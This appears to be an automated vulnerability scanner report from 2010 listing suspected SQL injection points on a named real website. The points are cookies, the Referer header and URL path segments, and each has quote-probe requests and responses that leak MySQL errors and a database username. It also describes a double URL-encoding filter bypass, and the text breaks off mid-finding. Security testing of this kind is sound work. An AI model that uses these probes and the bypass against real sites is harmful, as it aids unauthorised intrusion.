<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb'; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:25:34 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb''; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:25:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=2d14b64a6cbe67f6c9be7adeede1758a; path=/ Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog'/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 404 Component not found Date: Sat, 06 Nov 2010 06:23:12 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 06:23:13 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3015
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]... <title>404 - Error: 404</title> ...[SNIP]...
Request 2
GET /blog''/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:23:14 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c';
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:18:44 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c'';
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:18:45 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169';
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:14:02 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169'';
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:14:05 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:14:07 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:14:07 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34465
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The 7876d45a49f537da76cfb9e129203eee cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 7876d45a49f537da76cfb9e129203eee cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the 7876d45a49f537da76cfb9e129203eee cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef%2527; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:10:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef%2527%2527; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:10:37 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:10:38 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:10:39 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33669
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.google.com/search?hl=en&q=' Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 01:12:03 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.google.com/search?hl=en&q='' Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 01:12:03 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 01:12:04 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 01:12:04 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33583
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0'; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:12:04 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0''; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:12:09 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The optimizelyBuckets cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyBuckets cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D'; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:06:29 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D''; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:06:30 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
